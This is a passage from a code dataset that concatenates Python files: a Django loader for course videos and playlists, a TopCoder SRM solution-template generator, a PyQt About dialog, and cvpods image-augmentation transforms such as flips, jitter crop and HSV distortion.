load_programs(platform, programs_data):\n \"\"\"Load a list of programs\"\"\"\n blacklist = load_course_blacklist()\n duplicates = load_course_duplicates(platform)\n\n return [\n load_program(program_data, blacklist, duplicates)\n for program_data in programs_data\n ]\n\n\ndef load_video(video_data):\n \"\"\"Load a video into the database\"\"\"\n video_id = video_data.pop(\"video_id\")\n platform = video_data.pop(\"platform\")\n topics_data = video_data.pop(\"topics\", [])\n offered_bys_data = video_data.pop(\"offered_by\", [])\n runs_data = video_data.pop(\"runs\", [])\n\n video, created = Video.objects.update_or_create(\n video_id=video_id, platform=platform, defaults=video_data\n )\n\n load_topics(video, topics_data)\n load_offered_bys(video, offered_bys_data)\n\n for run_data in runs_data:\n load_run(video, run_data)\n\n if not created and not video.published:\n # NOTE: if we didn't see a video in a playlist, it is likely NOT being removed here\n # this gets addressed in load_channels after everything has been synced\n search_task_helpers.delete_video(video)\n elif video.published:\n search_task_helpers.upsert_video(video.id)\n\n return video\n\n\ndef load_videos(videos_data):\n \"\"\"\n Loads a list of videos data\n\n Args:\n videos_data (iter of dict): iterable of the video data\n\n Returns:\n list of Video:\n the list of loaded videos\n \"\"\"\n return [load_video(video_data) for video_data in videos_data]\n\n\ndef load_playlist_user_list(playlist, user_list_title):\n \"\"\"\n Load a playlist into a user list\n\n Args:\n playlist (Playlist): the playlist to generate a user list from\n user_list_title (str or None): title for the user list\n Returns:\n UserList or None:\n the created/updated user list or None\n 
\"\"\"\n owner_username = settings.OPEN_VIDEO_USER_LIST_OWNER\n if not owner_username:\n log.debug(\"OPEN_VIDEO_USER_LIST_OWNER is not set, skipping\")\n return None\n\n owner = User.objects.filter(username=owner_username).first()\n if owner is None:\n log.error(\n \"OPEN_VIDEO_USER_LIST_OWNER is set to '%s', but that user doesn't exist\",\n owner_username,\n )\n return None\n\n if not playlist.has_user_list:\n # if the playlist shouldn't have a user list, but it does, delete it\n if playlist.user_list:\n user_list = playlist.user_list\n search_task_helpers.delete_user_list(user_list)\n user_list.delete()\n return None\n\n # atomically ensure we create one and only one user list for this playlist\n with transaction.atomic():\n playlist = Playlist.objects.select_for_update().get(id=playlist.id)\n if not playlist.user_list:\n playlist.user_list = UserList.objects.create(\n author=owner,\n privacy_level=PrivacyLevel.public.value,\n list_type=ListType.LIST.value,\n )\n playlist.save()\n\n user_list = playlist.user_list\n user_list.title = user_list_title if user_list_title else playlist.title\n user_list.save()\n\n video_content_type = ContentType.objects.get_for_model(Video)\n\n items = []\n for playlist_video in playlist.playlist_videos.order_by(\"position\"):\n item, _ = UserListItem.objects.update_or_create(\n user_list=user_list,\n content_type=video_content_type,\n object_id=playlist_video.video_id,\n defaults={\"position\": playlist_video.position},\n )\n items.append(item)\n\n # prune any items from the previous state\n UserListItem.objects.filter(user_list=user_list).exclude(\n id__in=[item.id for item in items]\n ).delete()\n\n search_task_helpers.upsert_user_list(user_list.id)\n\n return user_list\n\n\ndef load_playlist(video_channel, playlist_data):\n \"\"\"\n Load a playlist\n\n Args:\n video_channel (VideoChannel): the video channel instance this playlist is under\n playlist_data (dict): the video playlist\n\n Returns:\n Playlist:\n the created or updated playlist\n \"\"\"\n platform = playlist_data.pop(\"platform\")\n playlist_id = playlist_data.pop(\"playlist_id\")\n videos_data = playlist_data.pop(\"videos\", [])\n topics_data = playlist_data.pop(\"topics\", [])\n offered_by_data = playlist_data.pop(\"offered_by\", [])\n user_list_title = playlist_data.pop(\"user_list_title\", None)\n\n playlist, _ = Playlist.objects.update_or_create(\n platform=platform,\n playlist_id=playlist_id,\n defaults={\"channel\": video_channel, **playlist_data},\n )\n\n load_topics(playlist, topics_data)\n load_offered_bys(playlist, offered_by_data)\n\n videos = load_videos(videos_data)\n\n # atomically remove existing videos in the playlist and add the current ones in bulk\n with transaction.atomic():\n for position, video in enumerate(videos):\n PlaylistVideo.objects.update_or_create(\n playlist=playlist, video=video, defaults={\"position\": position}\n )\n PlaylistVideo.objects.filter(playlist=playlist).exclude(\n video_id__in=[video.id for video in videos]\n ).delete()\n\n load_playlist_user_list(playlist, user_list_title)\n\n from course_catalog import tasks\n\n tasks.get_video_topics.delay(video_ids=[video.id for video in videos])\n\n return playlist\n\n\ndef load_playlists(video_channel, playlists_data):\n \"\"\"\n Load a list of channel playlists\n\n Args:\n video_channel (VideoChannel): the video channel instance this playlist is under\n playlists_data (iter of dict): iterable of the video playlists\n\n\n Returns:\n list of Playlist:\n the created or updated playlists\n \"\"\"\n playlists = 
[\n load_playlist(video_channel, playlist_data) for playlist_data in playlists_data\n ]\n playlist_ids = [playlist.id for playlist in playlists]\n\n # remove playlists that no longer exist\n playlists_to_unpublish = Playlist.objects.filter(channel=video_channel).exclude(\n id__in=playlist_ids\n )\n\n for playlist in playlists_to_unpublish.filter(has_user_list=True):\n user_list = playlist.user_list\n if user_list:\n search_task_helpers.delete_user_list(user_list)\n user_list.delete()\n\n playlists_to_unpublish.update(published=False, has_user_list=False)\n\n return playlists\n\n\ndef load_video_channel(video_channel_data):\n \"\"\"\n Load a single video channel\n\n Arg:\n video_channel_data (dict):\n the normalized video channel data\n Returns:\n VideoChannel:\n the updated or created video channel\n \"\"\"\n platform = video_channel_data.pop(\"platform\")\n channel_id = video_channel_data.pop(\"channel_id\")\n playlists_data = video_channel_data.pop(\"playlists\", [])\n topics_data = video_channel_data.pop(\"topics\", [])\n offered_by_data = video_channel_data.pop(\"offered_by\", [])\n\n video_channel, _ = VideoChannel.objects.update_or_create(\n platform=platform, channel_id=channel_id, defaults=video_channel_data\n )\n\n load_topics(video_channel, topics_data)\n load_offered_bys(video_channel, offered_by_data)\n load_playlists(video_channel, playlists_data)\n\n return video_channel\n\n\ndef load_video_channels(video_channels_data):\n \"\"\"\n Load a list of video channels\n\n Args:\n video_channels_data (iter of dict): iterable of the video channels data\n\n Returns:\n list of VideoChannel:\n list of the loaded videos\n \"\"\"\n video_channels = []\n\n # video_channels_data is a generator\n for video_channel_data in video_channels_data:\n channel_id = video_channel_data[\"channel_id\"]\n try:\n video_channel = load_video_channel(video_channel_data)\n except ExtractException:\n # video_channel_data has lazily evaluated generators, one of them could raise an extraction error\n # this is a small pollution of separation of concerns\n # but this allows us to stream the extracted data w/ generators\n # as opposed to having to load everything into memory, which will eventually fail\n log.exception(\n \"Error with extracted video channel: channel_id=%s\", channel_id\n )\n else:\n video_channels.append(video_channel)\n\n # unpublish the channels we're no longer tracking\n channel_ids = [channel for channel in video_channels_data]\n VideoChannel.objects.exclude(channel_id__in=channel_ids).update(published=False)\n\n # finally, unpublish any published videos that aren't in at least one published playlist\n for video in (\n Video.objects.annotate(\n in_published_playlist=Exists(\n PlaylistVideo.objects.filter(\n video_id=OuterRef(\"pk\"), playlist__published=True\n )\n )\n )\n .filter(published=True)\n .exclude(in_published_playlist=True)\n ):\n # remove it from the index first\n search_task_helpers.delete_video(video)\n video.published = False\n video.save()\n\n return video_channels\n\n\ndef load_content_file(course_run, content_file_data):\n \"\"\"\n Sync a course run file/page to the database\n\n Args:\n course_run (LearningResourceRun): a LearningResourceRun for a Course\n content_file_data (dict): File metadata as JSON\n\n Returns:\n ContentFile: the object that was created or updated\n \"\"\"\n try:\n content_file, _ = ContentFile.objects.update_or_create(\n run=course_run, key=content_file_data.get(\"key\"), defaults=content_file_data\n )\n return content_file\n except: # pylint: 
disable=bare-except\n log.exception(\n \"ERROR syncing course file %s for run %d\",\n content_file_data.get(\"uid\", \"\"),\n course_run.id,\n )\n\n\ndef load_content_files(course_run, content_files_json):\n \"\"\"\n Sync all content files for a course run to database and S3 if not present in DB\n\n Args:\n course_run (LearningResourceRun): a course run\n content_files_json (dict): Details about the course run's content files\n\n Returns:\n list of ContentFile: ContentFile objects that were created/updated\n\n \"\"\"\n if course_run.content_type and course_run.content_type.name == COURSE_TYPE:\n content_files = [\n load_content_file(course_run, content_file)\n for content_file in content_files_json\n ]\n if course_run.published:\n search_task_helpers.index_run_content_files(course_run.id)\n else:\n search_task_helpers.delete_run_content_files(course_run.id)\n return content_files\n","sub_path":"course_catalog/etl/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":18966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"112576252","text":"# Copyright (c) 2011 Benaka Moorthi\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport stringtemplate3\nimport re\nimport os\nfrom tidylib import tidy_document\nfrom srmtrainer.utility.signature_functions import parse_method_sig, transform_cpp_type\nfrom srmtrainer.utility.etc import *\n\nclass SolutionGenerator:\n\n templates = {\n 'cpp': 'problem.cpp'\n }\n\n sig_type_converters = {\n 'cpp': transform_cpp_type\n }\n\n def __init__(self, conf):\n self._conf = conf\n\n def generate(self, out_path, lang, srm, problem=None):\n template_to_use = None\n type_converter = None\n\n problems = None\n if problem:\n problems = [problem]\n else:\n srm.order_problems()\n problems = srm.problems\n\n template_file = None\n try:\n type_converter = SolutionGenerator.sig_type_converters[lang]\n template_file_name = SolutionGenerator.templates[lang]\n template_path = self._conf.app_data_join(template_file_name)\n\n if not os.path.isfile(template_path):\n self._conf.init_data_file(template_file_name)\n\n template_file = open(template_path, 'r')\n template_to_use = stringtemplate3.StringTemplate(template_file.read())\n finally:\n if template_file:\n template_file.close()\n\n problem_array = []\n for p in problems:\n (result_type, param_types) = parse_method_sig(p.method_sig, keep_param_names=True)\n\n param_types = [(type_converter(param[0]), param[1]) for param in param_types]\n\n # create method sig\n method_sig = type_converter(result_type) + ' ' + p.method_name + '('\n method_sig += ', '.join(['%s %s' % param for param in param_types])\n method_sig += ')'\n\n # create statement\n brs_removed = re.sub(r'\\s*<[Bb][Rr]\\s*/>\\s*', '\\n\\n', p.statement)\n brs_removed = re.sub(r'\\s*<[Bb][Rr]\\s*>\\s*[Bb][Rr]\\s*>', '\\n\\n', brs_removed)\n \n paragraphed = []\n for sect in re.split(r'[\\r\\n]+', brs_removed):\n paragraphed[len(paragraphed):] = ['', sect, '
']\n paragraphed = ''.join(paragraphed)\n\n document, errors = tidy_document(\n paragraphed, options={'show-body-only': True, 'wrap': 76, 'indent': True, 'vertical-space': True})\n document = re.sub(r'?p/?>\\n', '', str(document))\n statement = unescape_html(document.replace('\\n', '\\n//! '))\n\n # assign properties for problem\n problem_array[len(problem_array):] = [{\n 'level': p.level,\n 'statement': statement,\n 'type_name': p.type_name,\n 'method_sig': method_sig\n }]\n\n template_to_use['srm'] = {'problems': problem_array, 'title': srm.title}\n\n out = None\n try:\n out = open(out_path, 'w')\n out.write(str(template_to_use))\n finally:\n if out:\n out.close()\n\n","sub_path":"src/srmtrainer/gen/solution_generator.py","file_name":"solution_generator.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"322799191","text":"import os\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QDialog\nimport webbrowser\nfrom PyQt5.QtCore import pyqtSlot, Qt\nfrom GUI.Ui_about import Ui_About\n\n\nclass About(QDialog, Ui_About):\n\n def __init__(self, tag, parent=None):\n QDialog.__init__(self, parent)\n self.setupUi(self)\n self.__initLabel()\n self.__setUIStyle()\n\n @pyqtSlot()\n def on_commandLinkButton_clicked(self):\n print(\"open github\")\n webbrowser.open(\"https://github.com/ZxxWs/IdentifyBuilding\") # 打开GitHub网址\n\n def __initLabel(self):\n inforFile = os.getcwd() + \"\\\\Data\\\\aboutInfor.txt\"\n with open(inforFile, 'r', encoding=\"utf8\") as file:\n infor = file.read()\n self.label.setText(infor)\n file.close()\n\n def __setUIStyle(self):\n self.setWindowModality(Qt.ApplicationModal) # 设置其他界面不可点击\n\n self.setWindowIcon(QIcon('ArtRes/about.png'))\n self.setStyleSheet(\"QDialog{background-image:url(ArtRes/backgroudBlack.png)}\"\n \"QCommandLinkButton{color:#F5FFFA}\"\n \"QLabel{background-color:rgb(0,0,0,155)}\"\n \"QLabel{font-size:26px}\"\n \"QLabel{color:#F5FFFA}\"\n \"QLabel{border-radius: 17px}\"\n )\n","sub_path":"Code/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"190675799","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Copyright (c) BaseDetection, Inc. and its affiliates. All Rights Reserved\n\nimport inspect\nimport random\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Callable, TypeVar\n\nimport cv2\nimport numpy as np\nfrom PIL import Image, ImageFilter, ImageOps\nimport pycocotools.mask as mask_util\n\nimport torch\nimport torchvision.transforms as transforms\n\nimport cvpods\nfrom cvpods.structures import BoxMode\n\nfrom cvpods.data.transforms.transform_util import to_float_tensor, to_numpy\n\n__all__ = [\n \"JitterCropTransform\",\n \"HFlipTransform\",\n \"VFlipTransform\",\n \"NoOpTransform\",\n \"DistortTransform2\",\n \"ShiftTransform\",\n \"Transform\",\n \"ResizeTransform\",\n]\n\n\n# NOTE: to document methods in subclasses, it's sufficient to only document those whose\n# implemenation needs special attention.\n\n\nclass Transform(metaclass=ABCMeta):\n \"\"\"\n Base class for implementations of __deterministic__ transformations for\n image and other data structures. \"Deterministic\" requires that the output of\n all methods of this class are deterministic w.r.t their input arguments. In\n training, there should be a higher-level policy that generates (likely with\n random variations) these transform ops. Each transform op may handle several\n data types, e.g.: image, coordinates, segmentation, bounding boxes. Some of\n them have a default implementation, but can be overwritten if the default\n isn't appropriate. The implementation of each method may choose to modify\n its input data in-place for efficient transformation.\n \"\"\"\n\n def _set_attributes(self, params: list = None):\n \"\"\"\n Set attributes from the input list of parameters.\n\n Args:\n params (list): list of parameters.\n \"\"\"\n\n if params:\n for k, v in params.items():\n if k != \"self\" and not k.startswith(\"_\"):\n setattr(self, k, v)\n\n @abstractmethod\n def apply_image(self, img: np.ndarray):\n \"\"\"\n Apply the transform on an image.\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: image after apply the transformation.\n \"\"\"\n pass\n\n @abstractmethod\n def apply_coords(self, coords: np.ndarray):\n \"\"\"\n Apply the transform on coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is (x, y).\n\n Returns:\n ndarray: coordinates after apply the transformation.\n\n Note:\n The coordinates are not pixel indices. Coordinates on an image of\n shape (H, W) are in range [0, W] or [0, H].\n \"\"\"\n\n pass\n\n def apply_segmentation(self, segmentation: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply the transform on a full-image segmentation.\n By default will just perform \"apply_image\".\n\n Args:\n segmentation (ndarray): of shape HxW. The array should have integer\n or bool dtype.\n\n Returns:\n ndarray: segmentation after apply the transformation.\n \"\"\"\n return self.apply_image(segmentation)\n\n def apply_box(self, box: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply the transform on an axis-aligned box.\n By default will transform the corner points and use their\n minimum/maximum to create a new axis-aligned box.\n Note that this default may change the size of your box, e.g. 
in\n rotations.\n\n Args:\n box (ndarray): Nx4 floating point array of XYXY format in absolute\n coordinates.\n Returns:\n ndarray: box after apply the transformation.\n\n Note:\n The coordinates are not pixel indices. Coordinates on an image of\n shape (H, W) are in range [0, W] or [0, H].\n \"\"\"\n # Indexes of converting (x0, y0, x1, y1) box into 4 coordinates of\n # ([x0, y0], [x1, y0], [x0, y1], [x1, y1]).\n idxs = np.array([(0, 1), (2, 1), (0, 3), (2, 3)]).flatten()\n coords = np.asarray(box).reshape(-1, 4)[:, idxs].reshape(-1, 2)\n coords = self.apply_coords(coords).reshape((-1, 4, 2))\n minxy = coords.min(axis=1)\n maxxy = coords.max(axis=1)\n trans_boxes = np.concatenate((minxy, maxxy), axis=1)\n return trans_boxes\n\n def apply_polygons(self, polygons: list) -> list:\n \"\"\"\n Apply the transform on a list of polygons, each represented by a Nx2\n array.\n By default will just transform all the points.\n\n Args:\n polygon (list[ndarray]): each is a Nx2 floating point array of\n (x, y) format in absolute coordinates.\n Returns:\n list[ndarray]: polygon after apply the transformation.\n\n Note:\n The coordinates are not pixel indices. Coordinates on an image of\n shape (H, W) are in range [0, W] or [0, H].\n \"\"\"\n return [self.apply_coords(p) for p in polygons]\n\n def apply_meta_infos(self, meta_infos: dict) -> dict:\n return meta_infos\n\n def __call__(self, image, annotations=None, **kwargs):\n \"\"\"\n Apply transfrom to images and annotations (if exist)\n \"\"\"\n image_size = image.shape[:2] # h, w\n image = self.apply_image(image)\n\n if annotations is not None:\n for annotation in annotations:\n if \"bbox\" in annotation:\n bbox = BoxMode.convert(\n annotation[\"bbox\"], annotation[\"bbox_mode\"],\n BoxMode.XYXY_ABS)\n # Note that bbox is 1d (per-instance bounding box)\n annotation[\"bbox\"] = self.apply_box([bbox])[0]\n annotation[\"bbox_mode\"] = BoxMode.XYXY_ABS\n\n if \"segmentation\" in annotation:\n # each instance contains 1 or more polygons\n segm = annotation[\"segmentation\"]\n if isinstance(segm, list):\n # polygons\n polygons = [np.asarray(p).reshape(-1, 2) for p in segm]\n annotation[\"segmentation\"] = [\n p.reshape(-1) for p in\n self.apply_polygons(polygons)\n ]\n elif isinstance(segm, dict):\n # RLE\n mask = mask_util.decode(segm)\n mask = self.apply_segmentation(mask)\n assert tuple(mask.shape[:2]) == image_size\n annotation[\"segmentation\"] = mask\n else:\n raise ValueError(\n \"Cannot transform segmentation of type '{}'!\"\n \"Supported types are: polygons as list[list[float] or ndarray],\"\n \" COCO-style RLE as a dict.\".format(type(segm)))\n\n if \"keypoints\" in annotation:\n \"\"\"\n Transform keypoint annotation of an image.\n\n Args:\n keypoints (list[float]): Nx3 float in cvpods Dataset format.\n transforms (TransformList):\n image_size (tuple): the height, width of the transformed image\n keypoint_hflip_indices (ndarray[int]): see `create_keypoint_hflip_indices`.\n \"\"\"\n # (N*3,) -> (N, 3)\n keypoints = annotation[\"keypoints\"]\n keypoints = np.asarray(keypoints, dtype=\"float64\").reshape(\n -1, 3)\n keypoints[:, :2] = self.apply_coords(keypoints[:, :2])\n\n # This assumes that HorizFlipTransform is the only one that does flip\n do_hflip = isinstance(self,\n cvpods.data.transforms.transform.HFlipTransform)\n\n # Alternative way: check if probe points was horizontally flipped.\n # probe = np.asarray([[0.0, 0.0], [image_width, 0.0]])\n # probe_aug = transforms.apply_coords(probe.copy())\n # do_hflip = np.sign(probe[1][0] - probe[0][0]) 
!= np.sign(probe_aug[1][0] - probe_aug[0][0]) # noqa\n\n # If flipped, swap each keypoint with its opposite-handed equivalent\n if do_hflip:\n if \"keypoint_hflip_indices\" in kwargs:\n keypoints = keypoints[\n kwargs[\"keypoint_hflip_indices\"], :]\n\n # Maintain COCO convention that if visibility == 0, then x, y = 0\n # TODO may need to reset visibility for cropped keypoints,\n # but it does not matter for our existing algorithms\n keypoints[keypoints[:, 2] == 0] = 0\n\n annotation[\"keypoints\"] = keypoints\n\n # For sem seg task\n if \"sem_seg\" in annotation:\n sem_seg = annotation[\"sem_seg\"]\n if isinstance(sem_seg, np.ndarray):\n sem_seg = self.apply_segmentation(sem_seg)\n assert tuple(sem_seg.shape[:2]) == tuple(\n image.shape[:2]), (\n f\"Image shape is {image.shape[:2]}, \"\n f\"but sem_seg shape is {sem_seg.shape[:2]}.\"\n )\n annotation[\"sem_seg\"] = sem_seg\n else:\n raise ValueError(\n \"Cannot transform segmentation of type '{}'!\"\n \"Supported type is ndarray.\".format(type(sem_seg)))\n\n if \"meta_infos\" in annotation:\n meta_infos = annotation[\"meta_infos\"]\n meta_infos = self.apply_meta_infos(meta_infos)\n annotation[\"meta_infos\"] = meta_infos\n return image, annotations\n\n @classmethod\n def register_type(cls, data_type: str, func: Callable):\n \"\"\"\n Register the given function as a handler that this transform will use\n for a specific data type.\n\n Args:\n data_type (str): the name of the data type (e.g., box)\n func (callable): takes a transform and a data, returns the\n transformed data.\n\n Examples:\n\n .. code-block:: python\n\n def func(flip_transform, voxel_data):\n return transformed_voxel_data\n HFlipTransform.register_type(\"voxel\", func)\n\n # ...\n transform = HFlipTransform(...)\n transform.apply_voxel(voxel_data) # func will be called\n \"\"\"\n assert callable(\n func\n ), \"You can only register a callable to a Transform. Got {} instead.\".format(\n func)\n argspec = inspect.getfullargspec(func)\n assert len(argspec.args) == 2, (\n \"You can only register a function that takes two positional \"\n \"arguments to a Transform! Got a function with spec {}\".format(\n str(argspec)))\n setattr(cls, \"apply_\" + data_type, func)\n\n\n_T = TypeVar(\"_T\")\n\n\nclass JitterCropTransform(Transform):\n \"\"\"JitterCrop data augmentation used in YOLOv4.\n\n Notes:\n - Rewrite as Yolo.\n - A different method to crop image\n\n Steps:\n - 1. get random offset of four boundary\n - 2. get target crop size\n - 3. get target crop image\n - 4. filter bbox by valid region\n\n Args:\n pleft (int): left offset.\n pright (int): right offset.\n ptop (int): top offset.\n pbot (int): bottom offset.\n output_size (tuple(int)): output size (w, h).\n \"\"\"\n\n def __init__(self, pleft, pright, ptop, pbot, output_size):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. 
The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: the cropped image(s).\n \"\"\"\n oh, ow = img.shape[:2]\n\n swidth, sheight = self.output_size\n\n src_rect = [self.pleft, self.ptop, swidth + self.pleft,\n sheight + self.ptop] # x1,y1,x2,y2\n img_rect = [0, 0, ow, oh]\n # rect intersection\n new_src_rect = [max(src_rect[0], img_rect[0]),\n max(src_rect[1], img_rect[1]),\n min(src_rect[2], img_rect[2]),\n min(src_rect[3], img_rect[3])]\n dst_rect = [max(0, -self.pleft),\n max(0, -self.ptop),\n max(0, -self.pleft) + new_src_rect[2] - new_src_rect[0],\n max(0, -self.ptop) + new_src_rect[3] - new_src_rect[1]]\n\n # crop the image\n cropped = np.zeros([sheight, swidth, 3], dtype=img.dtype)\n cropped[:, :, ] = np.mean(img, axis=(0, 1))\n cropped[dst_rect[1]:dst_rect[3], dst_rect[0]:dst_rect[2]] = \\\n img[new_src_rect[1]:new_src_rect[3],\n new_src_rect[0]:new_src_rect[2]]\n return cropped\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Crop the coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is\n (x, y).\n Returns:\n ndarray: the flipped coordinates.\n\n Note:\n The inputs are floating point coordinates, not pixel indices.\n Therefore they are flipped by `(W - x, H - y)`, not\n `(W - 1 - x, H 1 - y)`.\n \"\"\"\n coords_offset = np.array([self.pleft, self.ptop], dtype=np.float32)\n coords = coords - coords_offset\n swidth, sheight = self.output_size\n coords[..., 0] = np.clip(coords[..., 0], 0, swidth - 1)\n coords[..., 1] = np.clip(coords[..., 1], 0, sheight - 1)\n return coords\n\n def apply_meta_infos(self, meta_infos: dict) -> dict:\n meta_infos[\"jitter_pad_left\"] = self.pleft\n meta_infos[\"jitter_pad_right\"] = self.pright\n meta_infos[\"jitter_pad_top\"] = self.ptop\n meta_infos[\"jitter_pad_bot\"] = self.pbot\n meta_infos[\"jitter_swidth\"] = self.output_size[0]\n meta_infos[\"jitter_sheight\"] = self.output_size[1]\n return meta_infos\n\n\nclass DistortTransform2(Transform):\n \"\"\"\n Distort image w.r.t hue, saturation and exposure.\n \"\"\"\n\n def __init__(self, hue, saturation, exposure):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. 
The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: the distorted image(s).\n \"\"\"\n dhue = np.random.uniform(low=-self.hue, high=self.hue)\n dsat = self._rand_scale(self.saturation)\n dexp = self._rand_scale(self.exposure)\n\n img = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n img = np.asarray(img, dtype=np.float32) / 255.\n img[:, :, 1] *= dsat\n img[:, :, 2] *= dexp\n H = img[:, :, 0] + dhue * 179 / 255.\n\n if dhue > 0:\n H[H > 1.0] -= 1.0\n else:\n H[H < 0.0] += 1.0\n\n img[:, :, 0] = H\n img = (img * 255).clip(0, 255).astype(np.uint8)\n img = cv2.cvtColor(img, cv2.COLOR_HSV2RGB)\n img = np.asarray(img, dtype=np.float32)\n\n return img\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n return coords\n\n def _rand_scale(self, upper_bound):\n \"\"\"\n Calculate random scaling factor.\n\n Args:\n upper_bound (float): range of the random scale.\n Returns:\n random scaling factor (float) whose range is\n from 1 / s to s .\n \"\"\"\n scale = np.random.uniform(low=1, high=upper_bound)\n if np.random.rand() > 0.5:\n return scale\n return 1 / scale\n\n\nclass HFlipTransform(Transform):\n \"\"\"\n Perform horizontal flip.\n \"\"\"\n\n def __init__(self, width: int):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the image(s).\n\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: the flipped image(s).\n \"\"\"\n tensor = torch.from_numpy(np.ascontiguousarray(img).copy())\n if len(tensor.shape) == 2:\n # For dimension of HxW.\n tensor = tensor.flip((-1))\n elif len(tensor.shape) > 2:\n # For dimension of HxWxC, NxHxWxC.\n tensor = tensor.flip((-2))\n return tensor.numpy()\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is (x, y).\n\n Returns:\n ndarray: the flipped coordinates.\n\n Note:\n The inputs are floating point coordinates, not pixel indices.\n Therefore they are flipped by `(W - x, H - y)`, not\n `(W - 1 - x, H 1 - y)`.\n \"\"\"\n coords[:, 0] = self.width - coords[:, 0]\n return coords\n\n def apply_meta_infos(self, meta_infos: dict) -> dict:\n pleft = meta_infos[\"jitter_pad_left\"]\n pright = meta_infos[\"jitter_pad_right\"]\n pleft, pright = pright, pleft\n meta_infos[\"jitter_pad_left\"] = pleft\n meta_infos[\"jitter_pad_right\"] = pright\n return meta_infos\n\n\nclass VFlipTransform(Transform):\n \"\"\"\n Perform vertical flip.\n \"\"\"\n\n def __init__(self, height: int):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the image(s).\n\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: the flipped image(s).\n \"\"\"\n tensor = torch.from_numpy(np.ascontiguousarray(img).copy())\n if len(tensor.shape) == 2:\n # For dimension of HxW.\n tensor = tensor.flip((-2))\n elif len(tensor.shape) > 2:\n # For dimension of HxWxC, NxHxWxC.\n tensor = tensor.flip((-3))\n return tensor.numpy()\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. 
Each row is (x, y).\n\n Returns:\n ndarray: the flipped coordinates.\n\n Note:\n The inputs are floating point coordinates, not pixel indices.\n Therefore they are flipped by `(W - x, H - y)`, not\n `(W - 1 - x, H - 1 - y)`.\n \"\"\"\n coords[:, 1] = self.height - coords[:, 1]\n return coords\n\n\nclass NoOpTransform(Transform):\n \"\"\"\n A transform that does nothing.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n return img\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n return coords\n\n\nclass ShiftTransform(Transform):\n \"\"\"\n Shift the image with random pixels.\n \"\"\"\n\n def __init__(self, shift_x: int, shift_y: int):\n \"\"\"\n Args:\n shift_x (int): the shift pixel for x axis.\n shift_y (int): the shift piexl for y axis.\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Shift the image(s).\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: shifted image(s).\n \"\"\"\n new_img = np.zeros_like(img)\n if self.shift_x < 0:\n new_x = 0\n orig_x = - self.shift_x\n else:\n new_x = self.shift_x\n orig_x = 0\n if self.shift_y < 0:\n new_y = 0\n orig_y = - self.shift_y\n else:\n new_y = 